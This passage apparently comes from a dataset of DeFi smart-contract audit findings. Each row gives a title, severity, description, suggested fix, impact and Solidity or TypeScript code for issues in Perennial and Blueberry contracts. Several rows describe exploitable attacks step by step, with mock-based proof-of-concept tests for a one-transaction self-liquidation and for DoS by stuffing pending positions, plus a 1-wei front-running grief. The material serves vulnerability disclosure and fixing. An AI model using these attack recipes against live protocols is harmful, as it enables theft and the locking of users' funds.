parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral before liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n 
setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(\"collateral after liquidation: \" + info.collateral + \" + \" + infoB.collateral + \" + \" + infoC.collateral + \" = \" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n -Market: DoS when stuffed with pending protected positionsчmediumчIn `_invariant`, there is a limit on the number of pending position updates. 
But for `protected` position updates, `_invariant` returns early and does not trigger this check.\\n```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n\\nAfter the `_invariant` check, the postion updates will be added into pending position queues.\\n```\\n _invariant(context, account, newOrder, collateral, protected);\\n\\n // store\\n _pendingPosition[context.global.currentId].store(context.currentPosition.global);\\n _pendingPositions[account][context.local.currentId].store(context.currentPosition.local);\\n```\\n\\nWhen the protocol enters next oracle version, the global pending queue `_pendingPosition` will be settled in a loop.\\n```\\n function _settle(Context memory context, address account) private {\\n // rest of code.\\n // settle\\n while (\\n context.global.currentId != context.global.latestId &&\\n (nextPosition = _pendingPosition[context.global.latestId + 1].read()).ready(context.latestVersion)\\n ) _processPositionGlobal(context, context.global.latestId + 1, nextPosition);\\n```\\n\\nThe OOG revert happens if there are too many pending position updates.\\nThis revert will happend on every `update` calls because they all need to settle this `_pendingPosition` before `update`.\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n 
_settle(context, account);\\n _update(context, account, newMaker, newLong, newShort, collateral, protect);\\n _saveContext(context, account);\\n }\\n```\\nчEither or both,\\nLimit the number of pending protected position updates that can be queued in `_invariant`.\\nLimit the number of global pending protected positions that can be settled in `_settle`.чThe protocol will be fully non-functional and funds will be locked. There will be no recovery from this DoS.\\nA malicious user can trigger this intentionally at very low cost. Alternatively, this can occur during a volatile market period when there are massive liquidations.ч```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n -It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no costчmediumчThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done on existing position or on a new position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount or open a new position with minimum allowed collateral 3.2. 
Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).\\nThe scenario of liquidating unsuspecting user is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: 
parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 
300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await market.positions(userB.address);\\n console.log(\"Liquidated maker: collateral = \" + info.collateral + \" maker = \" + pos.maker);\\n\\n})\\n```\\n\\nConsole output for the code:\\n```\\nLiquidated maker: collateral = 99980000 maker = 0\\n```\\n\\nSelf liquidation is the same, just the liquidator does this in 1 transaction and is owned by userB.чIndustry standard is to have initial margin (margin required to open position or withdraw collateral) and maintenance margin (margin required to keep the position solvent). Initial margin > maintenance margin and serves exactly for the reason to prevent users from being close to liquidation, intentional or not. I suggest to implement initial margin as a measure to prevent such self liquidation or unsuspected user liquidations. This will improve user experience (remove a lot of surprise liquidations) and will also improve security by disallowing intentional liquidations and cheaply overcoming the protocol limits such as efficiency limit: intentional liquidations are never good for the protocol as they're most often malicious, so having the ability to liquidate yourself in 1 transaction should definetely be prohibited.чThere are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). 
This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.\\nJust open long/short position from different accounts and wait for the large price update and frontrun it by withdrawing max collateral from the position which will be in a loss, and immediately liquidate it in the same transaction: with large price update one position will be liquidated with bad debt while the other position will be in a large profit, total profit from both positions will be positive and basically risk-free, meaning it's at the expense of the other users. While this strategy is possible to do on its own, liquidation in the same transaction allows it to be more profitable and catch more opportunities, meaning more damage to the other protocol users.\\nThe same core reason can also cause unsuspecting user to be unexpectedly liquidated in the following scenario:\\nUser opens position (10 ETH long at $1000, with $10000 collateral). User is choosing very safe leverage = 1. Market maintenance is set to 20% (max leverage = 5)\\nSome time later the price is still $1000 and user decides to close most of his position and withdraw collateral, so he reduces his position to 2 ETH long and withdraws $8000 collateral, leaving his position with $2000 collateral. It appears that the user is at the safe leverage = 1 again.\\nRight in the same block the liquidator commits non-requested oracle with a price $999.999 and immediately liquidates the user.\\nThe user is unsuspectedly liquidated even though he thought that he was at leverage = 1. 
But since collateral is withdrawn immediately, but position changes only later, user actually brought his position to max leverage and got liquidated. While this might be argued to be the expected behavior, it might still be hard to understand and unintuitive for many users, so it's better to prevent such situation from happening and the fix is the same as the one to fix self-liquidations.ч```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n 
longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await 
market.positions(userB.address);\\n console.log(\"Liquidated maker: collateral = \" + info.collateral + \" maker = \" + pos.maker);\\n\\n})\\n```\\n -update() wrong privilege controlчmediumчin `OracleFactory.update()` will call `oracle.update()`\\n```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n\\nBut `oracle.update()` permission is needed for `OracleFactory.owner()` and not `OracleFactory` itself.\\n```\\n function update(IOracleProvider newProvider) external onlyOwner {\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n\\n modifier onlyOwner {\\n if (msg.sender != factory().owner()) revert InstanceNotOwnerError(msg.sender);\\n _;\\n }\\n```\\n\\nThis results in `OracleFactory` not being able to do `update()`. 
Suggest changing the limit of `oracle.update()` to `factory()`.ч```\\ncontract Oracle is IOracle, Instance {\\n// rest of code\\n\\n- function update(IOracleProvider newProvider) external onlyOwner {\\n+ function update(IOracleProvider newProvider) external {\\n+ require(msg.sender == factory(),\"invalid sender\");\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n```\\nч`OracleFactory.update()` unable to add `IOracleProvider`ч```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n -`_accumulateFunding()` maker will get the wrong amount of funding fee.чmediumчThe formula that calculates the amount of funding in `Version#_accumulateFunding()` on the maker side is incorrect. 
This leads to an incorrect distribution of funding between the minor and the maker's side.\\n```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n\\nPoC\\nGiven:\\nlong/major: 1000\\nshort/minor: 1\\nmaker: 1\\nThen:\\nskew(): 999/1000\\nfundingMaker: 0.999 of the funding\\nfundingShort: 0.001 of the funding\\nWhile the maker only matches for `1` of the major part and contributes to half of the total short side, it takes the entire funding.чThe correct formula to calculate the amount of funding belonging to the maker side should be:\\n```\\nfundingMakerRatio = min(maker, major - minor) / min(major, minor + maker)\\nfundingMaker = fundingMakerRatio * fundingMinor\\n```\\nчч```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n -CurveTricryptoOracle incorrectly assumes that WETH is always the last token in the pool which leads to bad LP pricingчhighчCurveTricryptoOracle.sol#L53-L63\\n```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = 
base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n\\nWhen calculating LP prices, CurveTricryptoOracle#getPrice always assumes that WETH is the second token in the pool. This isn't the case which will cause the LP to be massively overvalued.\\nThere are 6 tricrypto pools currently deployed on mainnet. Half of these pools have an asset other than WETH as token[2]:\\n```\\n 0x4ebdf703948ddcea3b11f675b4d1fba9d2414a14 - CRV\\n 0x5426178799ee0a0181a89b4f57efddfab49941ec - INV\\n 0x2889302a794da87fbf1d6db415c1492194663d13 - wstETH\\n```\\nчThere is no need to assume that WETH is the last token. Simply pull the price for each asset and input it into lpPrice.чLP will be massively overvalued leading to overborrowing and protocol insolvencyч```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n -ConvexSpell/CurveSpell.openPositionFarm will revert in some casesчmediumчThe fix for this issue from this contest is as following:\\n```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. 
Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n\\nThe key to this issue is that `borrowBalance` may be smaller than `IERC20Upgradeable(borrowToken).balanceOf(address(this))`. For simplicity, assume that CurveSpell supports an lptoken which contains two tokens : A and B.\\nBob transferred 1wei of A and B to the CurveSpell contract. Alice opens a position by calling `BlueBerryBank#execute`, and the flow is as follows:\\nenter `CurveSpell#openPositionFarm`.\\ncall `_doLend` to deposit isolated collaterals.\\ncall `_doBorrow` to borrow 100e18 A token. 
borrowBalance = 100e18.\\n`A.approve(pool, 100e18)`.\\n`suppliedAmts[0] = A.balance(address(this)) = 100e18+1wei`, `suppliedAmts[1] = 0`.\\ncall `ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint)`, then revert because the approved amount is not enough.\\nTherefore, no one can successfully open a position.\\nOf course, bob can also transfer 1wei of `borrowToken` to contract by front-running `openPositionFarm` for a specific user or all users.чThe following fix is for CurveSpell, but please don't forget ConvexSpell.\\nTwo ways for fix it:\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -108,9 +108,7 @@ contract CurveSpell is BasicSpell {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -119,9 +117,7 @@ contract CurveSpell is BasicSpell {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -130,9 +126,7 @@ contract CurveSpell is BasicSpell {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n```\\n\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -103,7 +103,8 @@ contract CurveSpell is BasicSpell {\\n\\n // 3. 
Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n- _ensureApprove(param.borrowToken, pool, borrowBalance);\\n+ require(borrowBalance <= IERC20Upgradeable(borrowToken).balanceOf(address(this)), \"impossible\");\\n+ _ensureApprove(param.borrowToken, pool, IERC20Upgradeable(borrowToken).balanceOf(address(this)));\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n```\\nч`ConvexSpell/CurveSpell.openPositionFarm` will revert due to this issue.ч```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n -Mainnet oracles are incompatible with wstETH causing many popular yields strategies to be brokenчmediumчChainlinkAdapterOracle.sol#L111-L125\\n```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n\\nChainlinkAdapterOracle only supports single asset price data. 
This makes it completely incompatible with wstETH because chainlink doesn't have a wstETH oracle on mainnet. Additionally Band protocol doesn't offer a wstETH oracle either. This only leaves Uniswap oracles which are highly dangerous given their low liquidity.чCreate a special bypass specifically for wstETH utilizing the stETH oracle and it's current exchange rate.чMainnet oracles are incompatible with wstETH causing many popular yields strategies to be brokenч```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n -AuraSpell#closePositionFarm exits pool with single token and without any slippage protectionчmediumчAuraSpell.sol#L221-L236\\n```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n\\nWhen exiting a the balancer vault, closePositionFarm makes a subcall to _getExitPoolParams which is used to set minAmountsOut.\\nAuraSpell.sol#L358-L361\\n```\\n (address[] memory tokens, , ) = wAuraPools.getPoolTokens(lpToken);\\n\\n uint256 length = tokens.length;\\n uint256[] memory minAmountsOut = new uint256[](length);\\n```\\n\\nInside _getExitPoolParams we see that minAmountsOut are always an empty array. 
This means that the user has no slippage protection and can be sandwich attacked, suffering massive losses.чAllow user to specify min amount received from exitчExits can be sandwich attacked causing massive loss to the userч```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n -AuraSpell#closePositionFarm will take reward fees on underlying tokens when borrow token is also a rewardчmediumчAuraSpell.sol#L227-L247\\n```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n\\nWe can see above that closePositionFarm redeems the BLP before it takes the reward cut. This can cause serious issues. If there is any overlap between the reward tokens and the borrow token then _doCutRewardsFee will take a cut of the underlying liquidity. 
